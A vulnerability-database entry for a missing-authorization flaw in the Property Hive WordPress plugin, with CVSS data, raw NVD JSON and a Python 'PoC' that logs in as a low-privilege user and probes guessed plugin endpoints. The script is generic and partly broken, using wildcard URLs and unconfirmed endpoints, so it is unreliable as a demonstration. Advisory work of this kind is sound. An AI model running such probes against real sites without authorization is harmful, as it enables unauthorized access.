Security Vulnerability Report
中文
CVE-2025-66087 CVSS 4.3 MEDIUM

CVE-2025-66087

Published: 2025-11-21 13:15:50
Last Modified: 2026-04-27 18:16:35

Description

Missing Authorization vulnerability in Property Hive PropertyHive propertyhive allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PropertyHive: from n/a through <= 2.1.12.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Property Hive WordPress Plugin <= 2.1.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-66087 PoC - Property Hive Missing Authorization # This PoC demonstrates the broken access control vulnerability import requests import sys from urllib.parse import urljoin def exploit_cve_2025_66087(target_url, username, password): """ Exploit for Property Hive plugin <= 2.1.12 Missing Authorization Prerequisites: - Valid WordPress account with subscriber role or higher - Property Hive plugin installed and activated """ session = requests.Session() # WordPress login login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url } print(f'[*] Logging in as {username}...') resp = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print('[-] Login failed!') return False print('[+] Login successful!') # Identify vulnerable endpoints (requires manual enumeration) # Common Property Hive endpoints that may be affected: vulnerable_endpoints = [ '/wp-json/propertyhive/v1/properties', '/wp-json/propertyhive/v1/agents', '/wp-admin/admin-ajax.php?action=propertyhive_*', '/wp-admin/admin.php?page=propertyhive_*' ] print('[*] Testing for broken access control...') for endpoint in vulnerable_endpoints: full_url = urljoin(target_url, endpoint) try: resp = session.get(full_url, timeout=10) if resp.status_code == 200: print(f'[+] Vulnerable endpoint found: {endpoint}') print(f' Status: {resp.status_code}') print(f' Response preview: {resp.text[:200]}...') except requests.RequestException as e: print(f'[-] Error testing {endpoint}: {e}') print('[*] PoC execution completed') print('[*] Manual verification required to confirm exploitation') return True if __name__ == '__main__': if len(sys.argv) < 4: print(f'Usage: python3 {sys.argv[0]} <target_url> <username> <password>') print(f'Example: python3 {sys.argv[0]} http://example.com subscriber password123') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2025_66087(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66087", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:49.893", "lastModified": "2026-04-27T18:16:34.793", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Property Hive PropertyHive propertyhive allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PropertyHive: from n/a through <= 2.1.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/propertyhive/vulnerability/wordpress-propertyhive-plugin-2-1-12-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}